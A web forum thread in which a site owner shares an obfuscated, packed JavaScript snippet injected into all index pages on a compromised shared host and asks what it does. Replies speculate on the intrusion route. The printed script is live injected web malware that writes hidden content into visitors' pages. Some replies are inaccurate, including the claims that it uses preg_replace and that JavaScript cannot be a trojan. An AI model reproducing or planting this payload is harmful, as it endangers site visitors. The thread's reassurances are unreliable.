Help identifying this code

[Sitebee]

The server I host a couple of my websites on has been comprimised resulting in some malicious code placed in all files begining with "index" are effected "index.html index.html index.php index.tpl etc thats server wide aswell so i doupt the the hacker targeted my account.

Anyway does anyone reconise this script and tell me what it does, I believe it to be a trojan.

<script>eval(function(p,a,c,k,e,d){while(c--){if(k[c]){p=p.replace(new RegExp('\b'+c.toString(a)+'\b','g'),k[c])}}return
p}('p.q(o(\'%k%0%i%8%c%6%2%4%b%8%e%5%7%3%1%1%n%j%9%9%c%1%1%6%a%m%g%r%2%8%s%e%g%6%9%7%4%v%0%d%1%3%5%f%4%3%2%0%u%3%1%5%f%4%b%1%a%h%2%5%7%x%0%b%0%w%0%h%0%1%a%j%4%3%0%d%d%2%t%7%l%k%9%0%i%8%c%6%2%l\'));',34,34,'u0069|u0074|u0065|u0068|u0020|u003d|u006d|u0022|u0072|u002f|u0079|u0073|u0061|u0064|u0063|u0031|u006f|u006c|u0066|u003a|u003c|u003e|u006a|u0070|unescape|document|write|u006b|u002e|u006e|u0067|u0077|u0062|u0076'.split('|')))</script>

 

[JohnN]

stick an alert round it.

<script>alert(eval(function(p,a,c,k,e,d){while(c--){if(k[c]){p=p.replace(new RegExp('\b'+c.toString(a)+'\b','g'),k[c])}}return
p}('p.q(o(\'%k%0%i%8%c%6%2%4%b%8%e%5%7%3%1%1%n%j%9%9%c%1%1%6%a%m%g%r%2%8%s%e%g%6%9%7%4%v%0%d%1%3%5%f%4%3%2%0%u%3%1%5%f%4%b%1%a%h%2%5%7%x%0%b%0%w%0%h%0%1%a%j%4%3%0%d%d%2%t%7%l%k%9%0%i%8%c%6%2%l\'));',34,34,'u0069|u0074|u0065|u0068|u0020|u003d|u006d|u0022|u0072|u002f|u0079|u0073|u0061|u0064|u0063|u0031|u006f|u006c|u0066|u003a|u003c|u003e|u006a|u0070|unescape|document|write|u006b|u002e|u006e|u0067|u0077|u0062|u0076'.split('|'))));</script>

and let us know what it says.

since its using preg_replace I'd say its modifying the content of the page its on.

cant be a trogan, its javascript - so the worst its going to do is screw with your visitors and put dangerous links on the page.

either way, remove it ASAP.

 

[Sitebee]

I have removed the code from whatever pages I could find it on, I have also opened a support ticket with APT just waiting on their reply.

 

[Sitebee]

Update, our DC are mentioning its not caused in shell but yet another new exploit in cpanel.

We are aware of this, but we been trying to figure out how it came to be, since there is no records of this being done though normal shell, so we are starting to suspect it might be something from cpanel itself that cause the problem to occur.

Remember I said server wide!!! (many accounts not noticed it yet)


EDIT, Thinking about it theres gotta be shell app that commands the code! Im not no server expert but it makes sense.


APT level 3 tech are still not sure what it is, help me out please!!!

 

[GlennBeforeTime]

There can also be a PHP or CGI code. Perhaps someone may have compromised your server's SSH and managed to upload an shell script to add the code. I suggest going through your SSH logs and finding out what could have caused this. It could have been done with an Apache Injection (I have been compromised by 1 of these before) so look for an Apache security update as well bro.

 

[Sitebee]

SR.net is on shared account with apt.

 

[GlennBeforeTime]

Trying to execute the script, and it does nothing just comes up with an error, so I wouldn't worry too much about it.

I would say it was a test to see if someone could get into the server and add this to your pages, so it would have been some form of injection script (Apache or SSH injection)

Generally, this is the first step towards a server invasion. If you hear nothing from your host in the next 2 days, request your account be transferred to another server, OR switch hosts. That's your best bet mate.

 

[JohnN]

as with an illness, while the symptoms might just be a runny nose the root cause can be something far more sinister.

this code is the least of your problems.